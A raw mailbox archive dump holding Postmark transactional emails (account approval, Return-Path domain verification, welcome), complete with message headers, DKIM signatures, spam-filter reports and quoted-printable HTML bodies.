submitting an account approval reques= t. You can expect to hear from someone on our team within 24 hours. If it=E2= =80=99s the weekend, you=E2=80=99ll hear from us on Monday.</p> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; line-= height: 22px; text-align: left; margin-top: 0; font-size: 14px; margin-bott= om: 25px; color: #404040;">As a reminder, we review every new live account = manually to help us maintain the highest possible reliability and deliverab= ility rates for all of our customers.</p> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; line-= height: 22px; text-align: left; margin-top: 0; font-size: 14px; margin-bott= om: 25px; color: #404040;">Thanks for your patience through the approval pr= ocess! If you have any questions, feel free to reply to this email.</p> </td> </tr> <tr> <td class=3D"follow-banner" style=3D"font-family: Helvetica Neue,Helvetic= a,Arial,sans-serif; background-color: #ffde00; padding: 15px 50px;"> <table class=3D"follow-banner_links" width=3D"100%" cellpadding=3D"0" c= ellspacing=3D"0" align=3D"right" valign=3D"middle" style=3D"border-collapse= : collapse; mso-table-lspace: 0; mso-table-rspace: 0; font-size: 14px; text= -align: center;"> <tr> <td class=3D"align-center" style=3D"font-family: Helvetica Neue,Hel= vetica,Arial,sans-serif; text-align: center;"> <span>Follow us on</span> <img src=3D"https://newsletter.postmark= app.com/assets/images/twitter-dark@2x.png" alt=3D"Twitter Logo" width=3D"18= " height=3D"15" style=3D"margin-bottom: -3px;"> <a href=3D"https://twitter.= com/postmarkapp" style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-= serif; color: #272727; text-decoration: underline;">Twitter</a> and <img sr= c=3D"https://newsletter.postmarkapp.com/assets/images/linkedin-dark@2x.png"= alt=3D"LinekdIn Logo" width=3D"15" height=3D"15" style=3D"margin-bottom: -= 3px;"> <a href=3D"https://www.linkedin.com/company/postmarkapp" style=3D"fo= nt-family: Helvetica Neue,Helvetica,Arial,sans-serif; color: #272727; text-= decoration: underline;">LinkedIn</a> </td> </tr> </table> </td> </tr> <tr> <td class=3D"footer" style=3D"font-family: Helvetica Neue,Helvetica,Arial= ,sans-serif; font-size: 14px; background-color: #3b4049; color: #fff; paddi= ng: 0 50px;"> <p style=3D"color: #FFF; text-align: center; font-family: Helvetica Neu= e,Helvetica,Arial,sans-serif; line-height: 22px; font-size: 14px; margin: 1= 2px 0;">=F0=9F=92=8C <a href=3D"https://postmarkapp.com/newsletter" style=3D"color: rgba(2= 55, 255,255, .5); font-family: Helvetica Neue,Helvetica,Arial,sans-serif; t= ext-decoration: underline;">Subscribe to the Postmark newsletter</a> </p> </td> </tr> </table> </td> </tr> <tr> <td class=3D"footer footer--slim" style=3D"font-family: Helve= tica Neue,Helvetica,Arial,sans-serif; font-size: 14px; background-color: #e= eece4; color: #fff; border-top-width: 0; padding: 16px 50px;"> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,san= s-serif; line-height: 22px; text-align: center; font-size: 14px; color: #b0= aea7; margin: 0;"><a href=3D"https://www.activecampaign.com/?utm_source=3Dp= ostmark&utm_medium=3Demail" target=3D"_blank" style=3D"font-family: Hel= vetica Neue,Helvetica,Arial,sans-serif; color: #b0aea7; text-decoration: un= derline;">ActiveCampaign</a> LLC, 1 North Dearborn St, 5th Floor, Chicago, = IL 60602</p> </td> </tr> </table> </td> </tr> </table> </body> </html> --mk3-9d226e1e85ff436f803b2d506e9fbaf2-- PK }��Y�X��~R ~R A 1727026545.M694230P523957.mgh-web11.maghost.ro,S=21118,W=21510:2,nu ��٘� Return-Path: <pm_bounces@pmbounces.postmarkapp.com> Delivered-To: rudolph.perry@bloomingcostamices.com Received: from mgh-web11.maghost.ro by mgh-web11.maghost.ro with LMTP id yNcnKXFV8Ga1/gcAJwI5NA (envelope-from <pm_bounces@pmbounces.postmarkapp.com>) for <rudolph.perry@bloomingcostamices.com>; Sun, 22 Sep 2024 20:35:45 +0300 Return-path: <pm_bounces@pmbounces.postmarkapp.com> Envelope-to: rudolph.perry@bloomingcostamices.com Delivery-date: Sun, 22 Sep 2024 20:35:45 +0300 Received: from sc-ord-mta122.mtasv.net ([50.31.156.122]:43974) by mgh-web11.maghost.ro with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384 (Exim 4.97.1) (envelope-from <pm_bounces@pmbounces.postmarkapp.com>) id 1ssQUq-00000002CP7-1ETS for rudolph.perry@bloomingcostamices.com; Sun, 22 Sep 2024 20:35:45 +0300 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; s=pm20231108; d=pm.mtasv.net; h=From:Date:Subject:Message-Id:To:MIME-Version:Content-Type:Date:From: Message-ID:Reply-To:Sender:Subject:To:CC; t=1727026544; x=1727112944; bh=KLatNLK0Fq7r5rYmo1zfg4X3em38p2IQsU3fiUul/b4=; b=Hq4abdOj9e9rTu0/uE77faP83/kMW9GyXj5O/PEGg7IOltdXxuYOWe2AbnXEFHmrG68JkbnheKun e9FGs/FcBylYxKfFqPWKPAb2oImu6yuu83QOG0gSyZaWbcWBjoUy/b0VM/ZLKItMz4jQUZWgJ5Ul YlCmtL4Fvhbj1UkGSbI= Received: by sc-ord-mta122.mtasv.net id hu1akc3864od for <rudolph.perry@bloomingcostamices.com>; Sun, 22 Sep 2024 13:35:02 -0400 (envelope-from <pm_bounces@pmbounces.postmarkapp.com>) X-PM-IP: 50.31.156.122 X-IADB-IP: 50.31.156.122 X-IADB-IP-REVERSE: 122.156.31.50 DKIM-Signature: v=1; a=rsa-sha256; d=postmarkapp.com; s=20240110170422pm; c=relaxed/relaxed; i=support@postmarkapp.com; t=1727026502; x=1727199302; h=date:date:from:from:message-id:reply-to:sender:subject:subject:to:to:cc: feedback-id:mime-version:content-type; bh=KLatNLK0Fq7r5rYmo1zfg4X3em38p2IQsU3fiUul/b4=; b=VMNBvvGf1rcJtIMl/IHNrZNqqcKeV4zdPMUQayxLcXOvMwypMncaxh+pvGM9azPT2eqhMmQHwmB LT1OFjUVSY60EiT04Y0aGVASvTVNr8WVqpYv+McoOfQ0FnAEjGcagmZkzfaeGu7AuKHIFaIzmpK2B WQliIkp1CyLGwbEVTQc= From: Postmark Support <support@postmarkapp.com> Date: Sun, 22 Sep 2024 17:35:02 +0000 Subject: =?utf-8?b?V2XigJl2ZQ==?= verified your custom Return-Path for bloomingcostamices.com Message-Id: <d291dd9a-9d3e-4514-9f49-f7529844a9b5@mtasv.net> To: rudolph.perry@bloomingcostamices.com Feedback-ID: s40483-cmV0dXJuLXBhdGgtZG9tYWluLXZlcmlmaWVk:s40483:a50355:postmark X-Complaints-To: abuse@postmarkapp.com X-PM-Message-Id: d291dd9a-9d3e-4514-9f49-f7529844a9b5 X-PM-Tag: return-path-domain-verified X-PM-RCPT: |bTB8NTAzNTV8NDA0ODN8cnVkb2xwaC5wZXJyeUBibG9vbWluZ2Nvc3RhbWljZXMuY29t| X-PM-Message-Options: v1;1.UAd4aQWObawjm7KReLPQtw.Dp6d1fdVR9Z6QqkJcpdL8ucOUOw1wl9QgeFnHaPbTvoZPk5XzvI02XjQkP_D2F2C98if_jt2MUrT5hM93Bkx2Y9WikuQd7gV4biqccCCNNnlmkaxibCzznVPW4UgrN6tgv81YqYTMwpLcKWAkRjIbgCD9cCibR88JXu-eD6vvKbBIgxb_a1wEXhuzdM7JJrb MIME-Version: 1.0 X-PM-MTA-Pool: transactional-1 Content-Type: multipart/alternative; boundary=mk3-c378e56c062f45a5a38eaad5227e4d17; charset=UTF-8 X-Spam-Status: No, score=0.4 X-Spam-Score: 4 X-Spam-Bar: / X-Ham-Report: Spam detection software, running on the system "mgh-web11.maghost.ro", has NOT identified this incoming email as spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see root\@localhost for details. Content preview: Postmark (https://postmark.com) Hi Rudolph.Perry, Thanks for updating your DNS records! We've verified your Return-Path domain and any emails sent from the bloomingcostamices.com domain will use pm-bounces.bloomingcostamices.com as the Return-Path. Content analysis details: (0.4 points, 5.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- -0.0 SPF_PASS SPF: sender matches SPF record -0.0 SPF_HELO_PASS SPF: HELO matches SPF record -0.1 DKIM_VALID Message has at least one valid DKIM or DK signature 0.1 DKIM_SIGNED Message has a DKIM or DK signature, not necessarily valid -0.1 DKIM_VALID_AU Message has a valid DKIM or DK signature from author's domain 0.0 HTML_FONT_LOW_CONTRAST BODY: HTML font color similar or identical to background 0.0 HTML_MESSAGE BODY: HTML included in message 0.5 KAM_REALLYHUGEIMGSRC RAW: Spam with image tags with ridiculously huge http urls -0.0 DKIMWL_WL_HIGH DKIMwl.org - High trust sender X-Spam-Flag: NO --mk3-c378e56c062f45a5a38eaad5227e4d17 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable Postmark (https://postmark.com) Hi Rudolph.Perry, Thanks for updating your DNS records! We've verified your Return-Path domai= n and any emails sent from the bloomingcostamices.com domain will use pm-bo= unces.bloomingcostamices.com as the Return-Path. If you need any help or have questions, just reply to this email. Thanks, Postmark Team ActiveCampaign LLC, 1 North Dearborn St, 5th Floor, Chicago, IL 60602= --mk3-c378e56c062f45a5a38eaad5227e4d17 Content-Type: text/html; charset=UTF-8 Content-Transfer-Encoding: quoted-printable <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.= w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns=3D"http://www.w3.= org/1999/xhtml"><head> <meta name=3D"viewport" content=3D"width=3Ddevice-width, initial-scale=3D= 1.0"> <meta name=3D"x-apple-disable-message-reformatting"> <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3DUTF-8= "> <meta name=3D"color-scheme" content=3D"light dark"> <meta name=3D"supported-color-schemes" content=3D"light dark"> <title>Postmark</title> <style type=3D"text/css" rel=3D"stylesheet" media=3D"all">@media screen= and (max-width: 599px) { pre { width: 230px } } @media screen and (max-width: 599px) { .email-top_inner { width: 100% } } @media screen and (max-width: 599px) { .email-body_inner, .email-footer { w= idth: 100% } } @media only screen and (max-width: 500px) { .btn { width: 100% !important }= } @media screen and (max-width: 599px) { .hero { padding: 40px 30px 0 !import= ant } } @media screen and (max-width: 599px) { .welcome { padding: 30px 30px 10px != important } } @media screen and (max-width: 599px) { .signature { padding: 0 30px !import= ant } .signature_author, .signature_action { width: 100%; height: auto } .s= ignature_action { text-align: center } .signature_action td { padding-top: = 10px; padding-bottom: 25px; text-align: center } .postmark .signature--logo= .signature_action td { padding-top: 10px } } @media screen and (max-width: 599px) { .content-block { padding: 30px !impo= rtant } .content-block--image { padding-top: 0 !important; padding-bottom: = 0 !important } .content-block_image-container { text-align: center } .conte= nt-block_image-container, .content-block_body-container { width: 100% } .co= ntent-block--small .content-block_title { margin-top: 16px !important } } @media screen and (max-width: 599px) { .divider { padding: 20px 30px !impor= tant } .divider_image--desktop { display: none } .divider_image--mobile { d= isplay: block !important; height: auto !important; max-height: none !import= ant; font-size: 16px !important } .divider--thick { padding: 20px 0 !import= ant } .divider--no-padding { padding-top: 0 !important; padding-bottom: 0 != important } .divider--no-pad-bottom { padding-bottom: 0 !important } } @media screen and (max-width: 599px) { .testimonial { padding: 20px 30px !i= mportant } .testimonial_container { width: 100% } } @media screen and (max-width: 599px) { .cta-banner { padding: 30px !importa= nt } .cta-banner_title, .cta-banner_sub-title { text-align: center !importa= nt } .cta-banner_body, .cta-banner_action { width: 100% } .cta-banner_actio= n, .cta-banner_action td { text-align: center !important } .cta-banner--cen= tered .cta-banner_action td { text-align: center } } @media screen and (max-width: 599px) { .footer { padding: 0 30px !important= } .footer_table { width: 100% } .footer--slim { padding: 16px 30px !import= ant } } @media screen and (max-width: 599px) { .product-ad { float: none !important= ; width: 100%; margin-bottom: 30px } .product-ad_container { width: 220px }= } @media screen and (max-width: 599px) { .email-prefs { padding: 12px 30px !i= mportant } } @media screen and (max-width: 599px) { .follow-banner { padding: 15px 30px = !important } .follow-banner_logo, .follow-banner_links { width: 100%; text-= align: center !important } .follow-banner_logo { margin-bottom: 20px } .fol= low-banner_logo td { text-align: center !important } .follow-banner_links t= d { text-align: center !important } .follow-banner_links span { display: bl= ock } } @media screen and (max-width: 599px) { .post { padding: 16px 30px !importan= t } } @media screen and (max-width: 599px) { .share { padding: 20px 30px !importa= nt } } @media (prefers-color-scheme: dark) { body { background-color: #111111 !imp= ortant } .pm-snippet { background-color: #111111 !important; border-color: = #333333 !important; color: #E6E6E6 !important } .pm-key, .pm-domain { color= : #E6E6E6 !important } .spacer { background-color: #222222 !important; colo= r: transparent !important } .email-wrapper { background-color: #111111 !imp= ortant } .btn { color: #E6E6E6 !important } .btn:visited { color: #E6E6E6 != important } h1 { color: #E6E6E6 !important } h2 { color: #E6E6E6 !important= } h3 { color: #E6E6E6 !important } p { color: #E6E6E6 !important } ul { co= lor: #E6E6E6 !important } ol { color: #E6E6E6 !important } li { color: #E6E= 6E6 !important } .content-block { color: #E6E6E6 !important } .welcome, .co= ntent-block { background-color: #222222 !important } .divider_line { border= -color: #333333 !important } .divider { background-color: #222222 !importan= t } .purchase { border-color: #333333 !important } .purchase td { border-co= lor: #333333 !important } .cta-banner--dmarcdigests { border-top-color: #33= 3333 !important } .cta-banner { background-color: #222222 !important } .foo= ter { background-color: #111111 !important } .footer--slim p { color: #6666= 66 !important } .footer--slim a { color: #666666 !important } .footer--slim= a:visited { color: #666666 !important } .follow-banner { filter: brightnes= s(0.9) !important } .header--filled { filter: brightness(0.9) !important } = .header--digest { border-bottom-color: #333333 !important; background-color= : #222222 !important } .header--digest .header_logo img { filter: invert(1)= !important } .panel--warning { border-color: #847450 !important; backgroun= d: #34311A !important } .panel--error { border-color: #483737 !important; b= ackground-color: #2E2222 !important } .panel--success { border-color: #3D53= 32 !important; background-color: #2D302C !important } .panel--info { border= -color: #2C3D46 !important; background-color: #131D23 !important } .panel_t= itle { color: #E6E6E6 !important } .hero { filter: brightness(0.9) !importa= nt } } a:visited { color: #007DCC !important; text-decoration: underline !importan= t } a:visited img { border: none !important } .btn:visited { box-sizing: border-box !important; border-top: 10px solid #0= 07DCC !important; border-right: 18px solid #007DCC !important; border-botto= m: 10px solid #007DCC !important; border-left: 18px solid #007DCC !importan= t; background-color: #007DCC !important; font-size: 14px !important; displa= y: inline-block !important; height: auto !important; border-radius: 3px !im= portant; color: #FFFFFF !important; text-align: center !important; text-dec= oration: none !important; -webkit-text-size-adjust: none !important; font-w= eight: bold !important; padding: 5px 10px !important } .btn--ghost:visited { border-top: 10px solid #E6F2FA !important; border-rig= ht: 18px solid #E6F2FA !important; border-bottom: 10px solid #E6F2FA !impor= tant; border-left: 18px solid #E6F2FA !important; background-color: #E6F2FA= !important; font-size: 14px !important; display: inline-block !important; = height: auto !important; border-radius: 3px !important; color: #007DCC !imp= ortant; text-align: center !important; text-decoration: none !important; -w= ebkit-text-size-adjust: none !important } .testimonial_name a:visited { color: #333333 !important } .testimonial_position a:visited { color: #777777 !important } .footer--slim a:visited { color: rgba(255, 255, 255, 0.5) !important } .footer--outer a:visited { color: #A9A696 !important } .product-ad_link:visited { text-decoration: none !important } .email-prefs a:visited { color: #777777 !important } .postmark .follow-banner a:visited { color: #333333 !important } .post_title a:visited { color: #333333 !important } :root { color-scheme: light dark !important; supported-color-schemes: light= dark !important }</style> <!--[if mso]> <style type=3D"text/css"> .email-wrapper { font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif !import= ant; } p, ul, ol, li, blockquote { line-height: 1.5 !important; } </style> <![endif]--> </head> <body class=3D"postmark" style=3D"height: 100%; margin: 0; background-color= : #F5F3EB; color: #333333; line-height: 1.6; -webkit-text-size-adjust: none= ; width: 100% !important;"> <table class=3D"email-wrapper" width=3D"100%" cellpadding=3D"0" cellspaci= ng=3D"0" style=3D"border-collapse: collapse; mso-table-lspace: 0pt; mso-tab= le-rspace: 0pt; -premailer-width: 100%; -premailer-cellpadding: 0; -premail= er-cellspacing: 0; width: 100%; margin: 0; padding: 0; background-color: #F= 5F3EB;"> <tbody><tr> <td align=3D"center" style=3D"font-family: "Helvetica Neue"= , Helvetica, Arial, sans-serif;"> <table class=3D"email-content" width=3D"100%" cellpadding=3D"0" cel= lspacing=3D"0" style=3D"border-collapse: collapse; mso-table-lspace: 0pt; m= so-table-rspace: 0pt; -premailer-width: 100%; -premailer-cellpadding: 0; -p= remailer-cellspacing: 0; width: 100%; margin: 0; padding: 0;"> <tbody><tr> <td class=3D"email-top" width=3D"100%" cellpadding=3D"5" cellsp= acing=3D"0" style=3D"font-family: "Helvetica Neue", Helvetica, Ar= ial, sans-serif; padding: 10px 0;"> <table class=3D"email-top_inner" align=3D"center" width=3D"60= 0" cellpadding=3D"0" cellspacing=3D"0" style=3D"border-collapse: collapse; = mso-table-lspace: 0pt; mso-table-rspace: 0pt;"> <tbody><tr> <td class=3D"email-top_content" style=3D"font-family: &qu= ot;Helvetica Neue", Helvetica, Arial, sans-serif; text-align: center; = font-size: 12px; color: #A9A696;"></td> </tr> </tbody></table> </td> </tr> <tr> <td class=3D"email-body" width=3D"100%" cellpadding=3D"0" cells= pacing=3D"0" style=3D"font-family: "Helvetica Neue", Helvetica, A= rial, sans-serif;"> <table class=3D"email-body_inner" align=3D"center" width=3D"6= 00" cellpadding=3D"0" cellspacing=3D"0" style=3D"border-collapse: collapse;= mso-table-lspace: 0pt; mso-table-rspace: 0pt; background-color: #FFFFFF;"> <tbody><tr> <td class=3D"header header--filled" style=3D"font-family:= "Helvetica Neue", Helvetica, Arial, sans-serif; padding: 30px 0;= background-color: #FFDE00; text-align: center;"> <img label=3D"Logo" src=3D"https://newsletter.postmarka= pp.com/assets/images/pm_logo@2x.png" width=3D"200" alt=3D"ActiveCampaign Po= stmark" style=3D"margin-left: -27px;"> </td> </tr> <tr> <td class=3D"content-block" style=3D"font-family: "H= elvetica Neue", Helvetica, Arial, sans-serif; padding: 50px; backgroun= d-color: #FFFFFF;"> <p style=3D"margin: 0 0 25px; font-family: "Helvet= ica Neue", Helvetica, Arial, sans-serif; line-height: 25px; text-align= : left; color: #353942; font-size: 16px;">Hi Rudolph.Perry,</p> <p style=3D"margin: 0 0 25px; font-family: "Helvetica Neue", Helv= etica, Arial, sans-serif; line-height: 25px; text-align: left; color: #3539= 42; font-size: 16px;">Thanks for updating your DNS records! We=E2=80=99ve v= erified your Return-Path domain and any emails sent from the bloomingcostam= ices.com domain will use pm-bounces.bloomingcostamices.com as the Return-Pa= th.</p> <p style=3D"margin: 0 0 25px; font-family: "Helvetica Neue", Helv= etica, Arial, sans-serif; line-height: 25px; text-align: left; color: #3539= 42; font-size: 16px;">If you need any help or have questions, just reply to= this email.</p> <p style=3D"margin: 0 0 25px; font-family: "Helvetica Neue", Helv= etica, Arial, sans-serif; line-height: 25px; text-align: left; color: #3539= 42; font-size: 16px;">Thanks,<br>Postmark Team</p> </td> </tr> <tr> <td class=3D"follow-banner" style=3D"font-family: "H= elvetica Neue", Helvetica, Arial, sans-serif; padding: 15px 50px; back= ground-color: #FFDE00;"> <table class=3D"follow-banner_links" width=3D"100%" cel= lpadding=3D"0" cellspacing=3D"0" align=3D"center" valign=3D"middle" style=3D= "border-collapse: collapse; mso-table-lspace: 0pt; mso-table-rspace: 0pt; f= ont-size: 14px; text-align: center;"> <tbody> <tr> <td class=3D"align-center" style=3D"font-family: &q= uot;Helvetica Neue", Helvetica, Arial, sans-serif; text-align: center;= "> <span>Follow us on</span> <img src=3D"https://new= sletter.postmarkapp.com/assets/images/twitter-dark@2x.png" alt=3D"Twitter L= ogo" width=3D"18" height=3D"15" style=3D"margin-bottom: -3px;"> <a href=3D"= https://twitter.com/postmarkapp" style=3D"font-family: "Helvetica Neue= ", Helvetica, Arial, sans-serif; color: #333333; text-decoration: unde= rline;">Twitter</a> and <img src=3D"https://newsletter.postmarkapp.com/asse= ts/images/linkedin-dark@2x.png" alt=3D"LinekdIn Logo" width=3D"15" height=3D= "15" style=3D"margin-bottom: -3px;"> <a href=3D"https://www.linkedin.com/co= mpany/postmarkapp" style=3D"font-family: "Helvetica Neue", Helvet= ica, Arial, sans-serif; color: #333333; text-decoration: underline;">Linked= In</a> </td> </tr> </tbody> </table> </td> </tr> <tr> <td class=3D"footer footer--slim" style=3D"font-family: &= quot;Helvetica Neue", Helvetica, Arial, sans-serif; padding: 10px 50px= ; background-color: #353942; color: #FFFFFF; border-top: 0;"> <p style=3D"font-family: "Helvetica Neue", He= lvetica, Arial, sans-serif; line-height: 25px; text-align: center; margin: = 0; color: #353942; font-size: 14px;">=F0=9F=92=8C<a href=3D"https://postmar= kapp.com/newsletter" style=3D"font-family: "Helvetica Neue", Helv= etica, Arial, sans-serif; color: rgba(255, 255, 255, 0.5); text-decoration:= underline;">Subscribe to the Postmark newsletter</a></p> </td> </tr> <tr class=3D"footer footer--outer" style=3D"padding: 0 50px= ; background-color: #F5F3EB; color: #FFFFFF;"> <td style=3D"font-family: "Helvetica Neue", Hel= vetica, Arial, sans-serif; padding: 25px 0;"> <p style=3D"font-family: "Helvetica Neue", He= lvetica, Arial, sans-serif; line-height: 25px; text-align: center; margin: = 0; color: #A9A696; font-size: 14px;"> <a href=3D"https://activecampaign.com" target=3D"_bla= nk" style=3D"font-family: "Helvetica Neue", Helvetica, Arial, san= s-serif; color: #A9A696; text-decoration: underline;">ActiveCampaign LLC</a= >, 1 North Dearborn St, 5th Floor, Chicago, IL 60602 </p> </td> </tr> </tbody></table> </td> </tr> </tbody></table> </td> </tr> </tbody></table> <img src=3D"https://ea.pstmrk.it/open?m=3Dv3_1.oIGrjQ-k9empPn1J5VvZog.Th2mj= bYh3qh2-ImUcrIXUZBYFXmoSLNaABcdpvV-OCfqr9MUofzmdJoz_sGJANx6Zr2Y34SfLqxw2P23= 7bbeq12VvwCPgDmu4yZRc1XhTcxMmLud4ho6Xuc-FKkCNq27RA-Lil9Q_RwMrpNhWNJ9Zfds_S1= u0_WcGvKCa3WdSSb1wn5Kh87YzZ22FkiWV-AvJxfrFvuMFqK73o6ExiN2W54DUY-5UptzdlRYih= gU8bN390S3OLCcuRMiY78t7h2QDLJBkBKqOH1Ai-r9fiYSQPvjCii69copRAFyYU8K-XOIM6qbZ= NNyWg-cgNqY0RwXMtFkPPB8FDQBgB1NDi3kKv6YOSoYzPuR7896ZxNH5nlkibsSXhXgdBwLMFDi= iGNbxb3LR9kKUhzkg9XV4qjQVOlmmfGhdj110v3jQtAXrC8VJcOEC863tdLt02aDgCCkr1gwUBy= 0hw_A6URg3hq3MRld1B50ULN2db2gsVGTjulUUBbi9JiC92Py9MJT5vTeyUdImGCo-zNIXuiYw6= 7uk670KYU4VX0FOjJc8DWg2JkmnAxTL4he_kdJrIHPwYP0nTXFHeXPRNSULnjlEhXvNdottQaXD= AUrPsX07kh7jGY" width=3D"1" height=3D"1" border=3D"0" alt=3D"" /></body></h= tml>= --mk3-c378e56c062f45a5a38eaad5227e4d17-- PK }��Y�;!�e �e B 1727053175.M879076P644882.mgh-web11.maghost.ro,S=25997,W=26713:2,Snu ��٘� Return-Path: <pm_bounces@pmbounces.postmarkapp.com> Delivered-To: rudolph.perry@bloomingcostamices.com Received: from mgh-web11.maghost.ro by mgh-web11.maghost.ro with LMTP id GGlNM3e98GYS1wkAJwI5NA (envelope-from <pm_bounces@pmbounces.postmarkapp.com>) for <rudolph.perry@bloomingcostamices.com>; Mon, 23 Sep 2024 03:59:35 +0300 Return-path: <pm_bounces@pmbounces.postmarkapp.com> Envelope-to: rudolph.perry@bloomingcostamices.com Delivery-date: Mon, 23 Sep 2024 03:59:35 +0300 Received: from sc-ord-mta116.mtasv.net ([50.31.156.116]:33171) by mgh-web11.maghost.ro with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384 (Exim 4.97.1) (envelope-from <pm_bounces@pmbounces.postmarkapp.com>) id 1ssXQM-00000002hjC-1aLh for rudolph.perry@bloomingcostamices.com; Mon, 23 Sep 2024 03:59:35 +0300 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; s=pm20231108; d=pm.mtasv.net; h=From:Date:Subject:To:Message-Id:MIME-Version:Content-Type:Date:From: Message-ID:Reply-To:Sender:Subject:To:CC; t=1727053173; x=1727139573; bh=qGfs5fGD4HIAZnC4y56kFPOKRg6AIRrp1dACn9H2uDk=; b=otaJf1bIKxIP4Cjc0xP3mGjpSCzNYRCN9Xz6kfyCr6AyanHSsHkyE4K/87bsFusXJ7Kr4KzXuG1c Qj15tjI2kE4Xcxw55ZqC0KZuX52cRAMbDaAVNfsWCTTKKbAVfYy0oadBNBEMNXsOOXhDkTfQZawq bCWIN7vUS8yOTbMNQvM= Received: by sc-ord-mta116.mtasv.net id hu2ukm3864o0 for <rudolph.perry@bloomingcostamices.com>; Sun, 22 Sep 2024 20:58:51 -0400 (envelope-from <pm_bounces@pmbounces.postmarkapp.com>) X-PM-IP: 50.31.156.116 X-IADB-IP: 50.31.156.116 X-IADB-IP-REVERSE: 116.156.31.50 DKIM-Signature: v=1; a=rsa-sha256; d=postmarkapp.com; s=20240110170422pm; c=relaxed/relaxed; i=support@postmarkapp.com; t=1727053131; x=1727225931; h=date:date:from:from:message-id:reply-to:sender:subject:subject:to:to:cc: feedback-id:mime-version:content-type; bh=qGfs5fGD4HIAZnC4y56kFPOKRg6AIRrp1dACn9H2uDk=; b=JYba0vg6YSnjLaEi8iLnBwTY5GD9nbrq0Q2sivMtgTO1hHpo7p1U2DWFV0zLCqb+O2XJSU3M3VV eqPypwrqkO7EPbT9UB09mXw/Eb3+NDd5nz2dnjll+8fA2Wo2T0bTV3UBsTPwwBd+Q9ZCO3wiRIoj+ PdNOmBkw7LP6X80fIKM= From: Postmark <support@postmarkapp.com> Date: Mon, 23 Sep 2024 00:58:50 +0000 Subject: Welcome to the Postmark family! To: rudolph.perry@bloomingcostamices.com Message-Id: <66f0bd4ad37d6_66cb20a58953d@ip-172-26-31-73.us-east-2.compute.internal.mail> Feedback-ID: s40483-d2VsY29tZQ==:s40483:a50355:postmark X-Complaints-To: abuse@postmarkapp.com X-PM-Message-Id: 53d3dae1-e347-494f-900a-a23a297a4a4e X-PM-Tag: welcome X-PM-RCPT: |bTB8NTAzNTV8NDA0ODN8cnVkb2xwaC5wZXJyeUBibG9vbWluZ2Nvc3RhbWljZXMuY29t| X-PM-Message-Options: v1;1.U2KxUYaI0D0QsuT56-uf-w.VcItKIaTJloiVnwfRYarQ6B45j-zBhZFEKiGTu6sMjy-7pRVCZjC4pXpfkXPXoEbltLgTcf5JaMugpdytt3CP540Qlh74lg9Xf8FoPZ7YopWwE26N3TxofFLzGEux9Zm6B-v2qzZAyl6gvule6tbZ0HOGcpypNhuwXLNeq2KW11bbPepeoRVIh4gCQWVo9JQ MIME-Version: 1.0 X-PM-MTA-Pool: transactional-1 Content-Type: multipart/alternative; boundary=mk3-70a2fcdebbdc446fa8f28c0df4201132; charset=UTF-8 X-Spam-Status: No, score=-0.2 X-Spam-Score: -1 X-Spam-Bar: / X-Ham-Report: Spam detection software, running on the system "mgh-web11.maghost.ro", has NOT identified this incoming email as spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see root\@localhost for details. Content preview: Welcome Rudolph.Perry, You’re in! We’re writing to let you know that Andrés manually reviewed and approved your account and you can now start sending email from your app to any email address. As a reminder, your username is Rudolph.Perry Content analysis details: (-0.2 points, 5.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- -0.0 SPF_PASS SPF: sender matches SPF record -0.0 SPF_HELO_PASS SPF: HELO matches SPF record -0.1 DKIM_VALID Message has at least one valid DKIM or DK signature -0.1 DKIM_VALID_AU Message has a valid DKIM or DK signature from author's domain 0.1 DKIM_SIGNED Message has a DKIM or DK signature, not necessarily valid 0.0 HTML_MESSAGE BODY: HTML included in message -0.1 DKIMWL_WL_HIGH DKIMwl.org - High trust sender X-Spam-Flag: NO --mk3-70a2fcdebbdc446fa8f28c0df4201132 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable Welcome Rudolph.Perry, You=E2=80=99re in! We=E2=80=99re writing to let you know that Andr=C3=A9s m= anually reviewed and approved your account and you can now start sending em= ail from your app to any email address. As a reminder, your username is Rudolph.Perry You can log into your account here: http://account.postmarkapp.com/login Thanks for your patience during this process. We manually review every new = account to help us maintain the highest possible reliability and deliverabi= lity rates for all of our customers. =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D We=E2=80=99ve started you off on the free developer plan (100 test emails p= er month). Feel free to upgrade when you=E2=80=99re ready to increase your = monthly email limit. Upgrade your plan here: https://account.postmarkapp.com/subscription =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D Now that you=E2=80=99re part of the Postmark family, there are a few things= you can expect from us: * First and foremost, you can expect your emails to be delivered quickly to= your customers=E2=80=99 inboxes. That is why we exist, and we=E2=80=99ll n= ever lose sight of that. * You can also expect clear and accurate documentation, a straightforward U= I, and helpful support from friendly humans who know what they=E2=80=99re t= alking about (and who want to see your business thrive as much as you do). If you have any questions as you get set up, just reply and we=E2=80=99ll d= o everything we can to help you along. Also be sure to check out our step-b= y-step guide on how to implement Postmark in the way that=E2=80=99s best fo= r your app. https://postmarkapp.com/manual Seriously, though =E2=80=94 welcome. We=E2=80=99re really happy you=E2=80=99= re with us. Postmark Team https://postmarkapp.com/support Follow us for the latest updates: http://twitter.com/postmarkapp 